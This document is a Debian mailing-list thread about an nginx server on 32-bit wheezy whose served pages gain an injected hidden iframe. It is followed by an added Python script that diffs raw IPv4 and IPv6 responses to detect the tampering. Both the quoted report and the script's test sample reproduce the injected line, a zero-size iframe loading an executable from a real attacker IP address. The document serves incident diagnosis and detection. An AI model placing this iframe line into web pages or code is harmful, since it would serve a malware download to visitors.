Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
> On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
> > Last fall there was a debian 64-bit / nginx rootkit going around,
> > now I've been hit with what sounds similar but on 32-bit wheezy.
> >
> > All files served by nginx have this line inserted at the top:
> >
> > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
> >
> > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> > Debian Wheezy i386 machine in a safe environment and did a diff -r. No
> > difference.
> >
> > No insmod line in /etc/rc.local
> >
> > I haven't been able to find anything. Googling doesn't show anything
> > similar for debian wheezy i386, only squeeze 64-bit.
> >
> > I was using nginx-light from dotdeb.org. I uninstalled nginx and tried
> > the nginx-light from debian wheezy but it made no difference.
>
> Just out of curiosity, did you back up nginx and check it as well?
>
> --
> Joel Rees
No, I just uninstalled nginx from dotdeb and installed from Debian.

The webpages are all static and remain unchanged, the nginx config files
are OK. The new line is added by some process I can't find.

The lynx web browser shows this as the first line of the webpages:

IFRAME: http://122.226.137.123:1111/yixi.exe

It also appears in downloads using wget.

"view source" in firefox or chrome shows nothing amiss.

It only appears on IPv4, not IPv6.

I do not have php installed.

The http header is completely different. curl -I shows this:

HTTP/1.1 200 OK
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3634

When it should look more like this:

HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 11 Sep 2013 23:39:48 GMT
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3291
Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5101a7f4-cdb"
Accept-Ranges: bytes

I installed chkrootkit, rkhunter, unhide.rb and they found nothing.
E Frank Ball frankb@efball.com
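The symptoms Frank lists above (nginx's usual Server/Date/Last-Modified/ETag headers gone, a different Content-Length, and an <iframe> prepended to every file on the IPv4 path only) are the kind of thing a small response-comparison check can flag automatically, so a server can be re-checked after cleanup without eyeballing curl output. The script below is an added example written for this post, not code from the thread or from any tool named in it. It parses two raw HTTP responses, flags missing expected headers, a body that begins with an iframe, and an iframe whose src ends in .exe, and then diffs the two fetches. The expected header list and the two sample responses are constructed to mirror the curl -I output quoted above; in practice you would feed it the raw output of `curl -4 -i` and `curl -6 -i` against the same URL.

```python
import re
from dataclasses import dataclass

# Headers nginx sends for a static file in the clean "curl -I" output quoted in
# the thread; the tampered IPv4 responses lacked all of them.
EXPECTED_HEADERS = ("server", "date", "last-modified", "etag", "accept-ranges")

# Permissive <iframe src=...> matcher: the injected tag uses "src= http://..."
# (space after '=', no quotes), so a strict attribute parser would miss it.
IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?\s*([^\s'\">]+)", re.I)


@dataclass
class Response:
    status: str
    headers: dict  # header names lower-cased
    body: str


def parse_response(raw: str) -> Response:
    """Split a raw HTTP/1.x response into status line, header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Response(lines[0], headers, body)


def inspect(resp: Response) -> list:
    """Per-response checks; an empty list means nothing looked wrong."""
    findings = []
    missing = [h for h in EXPECTED_HEADERS if h not in resp.headers]
    if missing:
        findings.append("missing headers: " + ", ".join(missing))
    # Declared length vs. bytes actually delivered (an in-path rewriter that
    # forgets to fix Content-Length trips this one)
    declared = resp.headers.get("content-length")
    if declared is not None and int(declared) != len(resp.body.encode()):
        findings.append(f"content-length {declared} != body {len(resp.body.encode())}")
    # The injected tag sits at the very top of every served file
    if resp.body.lstrip().lower().startswith("<iframe"):
        findings.append("body starts with an <iframe>")
    for m in IFRAME_SRC.finditer(resp.body):
        src = m.group(1)
        if src.lower().endswith(".exe"):
            findings.append(f"iframe loads an executable: {src}")
    return findings


def compare(seen: Response, reference: Response) -> list:
    """Differences between two fetches of one URL, e.g. over IPv4 and IPv6."""
    diffs = []
    ref_lines = reference.body.splitlines()
    extra = [ln for ln in seen.body.splitlines() if ln not in ref_lines]
    if extra:
        diffs.append("lines only in first response: " + " | ".join(extra))
    a = seen.headers.get("content-length")
    b = reference.headers.get("content-length")
    if a != b:
        diffs.append(f"content-length differs: {a} vs {b}")
    only_ref = sorted(set(reference.headers) - set(seen.headers))
    if only_ref:
        diffs.append("headers only in reference: " + ", ".join(only_ref))
    return diffs


def build_response(headers: list, body: str) -> str:
    """Assemble a raw response whose Content-Length matches the body."""
    hdrs = headers + [f"Content-Length: {len(body.encode())}"]
    return "HTTP/1.1 200 OK\r\n" + "\r\n".join(hdrs) + "\r\n\r\n" + body


# Constructed samples modelled on the thread: one page as served over IPv4
# (tampered) and over IPv6 (clean).
PAGE = "<html><body>hello</body></html>\n"
INJECTED = ("<iframe src= http://122.226.137.123:1111/yixi.exe "
            "width=0 height=0></iframe>\n")
TAMPERED_IPV4 = build_response(
    ["Content-Type: text/html; charset=en_US.UTF-8"], INJECTED + PAGE)
CLEAN_IPV6 = build_response(
    ["Server: nginx/1.4.2", "Date: Wed, 11 Sep 2013 23:39:48 GMT",
     "Content-Type: text/html; charset=en_US.UTF-8",
     "Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT", "Connection: keep-alive",
     "Vary: Accept-Encoding", 'ETag: "5101a7f4-cdb"', "Accept-Ranges: bytes"],
    PAGE)


def run_checks() -> dict:
    """Inspect both samples and diff them; keyed results for callers/tests."""
    v4, v6 = parse_response(TAMPERED_IPV4), parse_response(CLEAN_IPV6)
    return {"ipv4": inspect(v4), "ipv6": inspect(v6), "diff": compare(v4, v6)}


if __name__ == "__main__":
    for name, items in run_checks().items():
        print(name + ":")
        for item in items:
            print("  " + item)
```

Because the check works on raw responses rather than on files in the document root, it catches exactly the case Frank describes, where the on-disk pages and the nginx config are unchanged and the line is added somewhere on the way out. Running it from a separate host over both address families, and comparing against a copy fetched from a known-clean mirror of the same content, separates "the file was changed" from "something on this host rewrites responses".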